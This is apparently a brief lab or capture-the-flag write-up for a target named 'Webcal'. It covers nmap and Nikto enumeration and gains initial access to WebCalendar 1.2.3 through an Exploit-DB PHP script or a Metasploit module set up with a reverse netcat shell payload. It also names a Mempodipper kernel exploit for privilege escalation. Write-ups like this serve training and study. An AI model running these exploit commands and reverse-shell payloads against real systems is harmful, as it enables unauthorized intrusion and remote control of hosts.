search

Webcal

hashtag
Enumeration

80/tcp open  http    Apache httpd 2.2.20 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.20 (Ubuntu)
|_http-title: Construction Page
- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.175.37
+ Target Port: 80
...
+ OSVDB-3093: GET /webcalendar/login.php: This might be interesting...

WebCalendar v1.2.3 (14 Aug 2010)

hashtag
Initial Access

$ php /usr/share/exploitdb/exploits/php/webapps/18775.php 192.168.175.37 /webcalendar/

OR

msf6 exploit(linux/http/webcalendar_settings_exec) > options

Module options (exploit/linux/http/webcalendar_settings_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,t
                                         ype:host:port][...]
   RHOSTS     192.168.175.37   yes       The target host(s), range CIDR identifier
                                         , or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connection
                                         s
   TARGETURI  /webcalendar/    yes       The URI path to webcalendar
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tun0             yes       The listen address (an interface may be speci
                                     fied)
   LPORT  80               yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WebCalendar 1.2.4 on Linux

hashtag
PrivEsc

Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation (2) | exploits/linux/local/35161.c

PreviousWallaNextXposedAPI

Last updated